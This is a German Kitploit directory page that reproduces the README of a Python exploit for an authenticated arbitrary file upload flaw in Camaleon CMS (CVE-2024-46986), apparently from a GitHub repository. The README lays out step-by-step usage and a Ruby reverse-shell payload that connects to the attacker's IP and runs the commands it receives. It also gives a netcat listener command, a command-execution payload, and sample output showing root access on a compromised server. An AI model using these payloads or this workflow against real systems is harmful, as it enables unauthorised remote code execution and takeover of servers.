Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46986 — Automatisierter Python-Exploit für die beliebige Datei-Upload-Schwachstelle in Camaleon CMS (CVE-2024-46986). Unterstützt Payloads für Reverse Shell und Befehlsausführung für authentifizierte Remote-Codeausführung. | Kitploit
Tools/GitHubGitHub/vidura2/cve-2024-46986
ExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubvidura2/cve-2024-46986

CVE-2024-46986

Automatisierter Python-Exploit für die beliebige Datei-Upload-Schwachstelle in Camaleon CMS (CVE-2024-46986). Unterstützt Payloads für Reverse Shell und Befehlsausführung für authentifizierte Remote-Codeausführung.

Repository anzeigen
39vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46986

Camaleon CMS Exploit - Beliebiger Dateiupload

Dieses Repository enthält ein Python-Skript, das die Ausnutzung einer Dateiupload-Schwachstelle in Camaleon CMS automatisiert. Die Schwachstelle ermöglicht es einem Angreifer, beliebige Dateien (wie Ruby-Skripte) auf den Server hochzuladen, was potenziell zu Remote-Code-Ausführung (RCE) oder anderen schwerwiegenden Sicherheitsauswirkungen führen kann.

Funktionen

  • Dateiupload-Exploit: Lädt schädliche Ruby-Skripte auf den Zielserver hoch.
  • Payload-Optionen: Wählen Sie zwischen einem Reverse-Shell-Payload und einem Befehlsausführungs-Payload.
  • Wiederholte Befehlsausführung: Beim Befehlsausführungs-Payload erlaubt das Skript dem Benutzer, wiederholt Befehle einzugeben.
  • Automatisierung: Automatisiert den gesamten Prozess mit Python's requests-Bibliothek.

Voraussetzungen

  • Gültige Benutzeranmeldeinformationen: Für den Exploit ist eine authentifizierte Sitzung erforderlich. Sie benötigen das auth_token und die _cms_session eines gültigen Benutzers.
  • Python 3.x: Stellen Sie sicher, dass Python 3.x installiert ist.
  • Python requests-Bibliothek: Installieren Sie die requests-Bibliothek, falls noch nicht geschehen.
  • root@kitploit:~
    pip install requests
    

    Verwendung

    Repository klonen:

    root@kitploit:~
    https://github.com/vidura2/CVE-2024-46986.git
    cd CVE-2024-46986
    

    Skript anpassen:

    • Ersetzen Sie die Platzhalter your_auth_token_here, your_session_token_here und https://target_site_here im Python-Skript durch tatsächliche Werte.
    • Wenn Sie den Reverse-Shell-Payload verwenden, ersetzen Sie auch your_ip und your_port durch Ihre IP-Adresse und den Port, auf dem Sie einen Listener einrichten.

    Payload-Typ auswählen:

    • Reverse Shell: Um eine Reverse Shell hochzuladen, setzen Sie die Variable payload_type im Skript auf "reverse_shell".
    • Befehlsausführung: Um ein Skript hochzuladen, das Systembefehle ausführt, setzen Sie payload_type auf "command_execution". Sie können dann wiederholt Befehle zur Ausführung auf dem Zielserver eingeben.

    Exploit ausführen:

    root@kitploit:~
    python exploit_camaleon.py
    

    Wenn Sie den Befehlsausführungs-Payload verwenden, können Sie mehrere Befehle eingeben:

    root@kitploit:~
    Enter a system command to execute (or type 'exit' to quit): whoami
    Enter a system command to execute (or type 'exit' to quit): ls
    Enter a system command to execute (or type 'exit' to quit): exit
    

    Payload-Typen

    1. Reverse Shell

    Der Reverse-Shell-Payload stellt eine Verbindung zum Rechner des Angreifers her und ermöglicht Remote-Code-Ausführung auf dem Server.

    root@kitploit:~
    Ändern Sie IP und Port im Ruby-Skript innerhalb des Python-Codes.
    
    Beispiel-Payload:
    
    ruby
    

    require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

    Richten Sie einen Listener auf Ihrem Rechner mit netcat ein:

    bash

    root@kitploit:~
    nc -lvnp <your_port>
    

    2. Befehlsausführung

    Dieser Payload lädt ein Ruby-Skript hoch, das Systembefehle (z.B. whoami) auf dem Server ausführt. Sie können während der Ausführung wiederholt Befehle eingeben.

    root@kitploit:~
    Das Skript wird solange nach Befehlen fragen, bis Sie 'exit' eingeben.
    Beispiel:
    
    ruby
    
    system("whoami")
    

    Beispiel eines erfolgreichen Exploits

    Nach erfolgreicher Ausführung des Exploits sollte eine Erfolgsmeldung im Terminal erscheinen:

    python

    Exploit executed successfully with payload type: reverse_shell!

    Wenn Sie die Reverse Shell verwenden, sollte der netcat-Listener Ihnen Zugriff auf die Shell des kompromittierten Servers geben.

    Für den Befehlsausführungs-Payload:

    bash

    Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

    Haftungsausschluss

    Dieses Skript ist nur für Bildungszwecke gedacht. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Exploit verursacht werden. Stellen Sie immer sicher, dass Sie die Erlaubnis haben, bevor Sie Schwachstellen testen oder ausnutzen.

    Mitwirken

    Zögern Sie nicht, Issues oder Pull-Requests für Verbesserungen oder zusätzliche Funktionen einzureichen!

    Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

    Tool herunterladen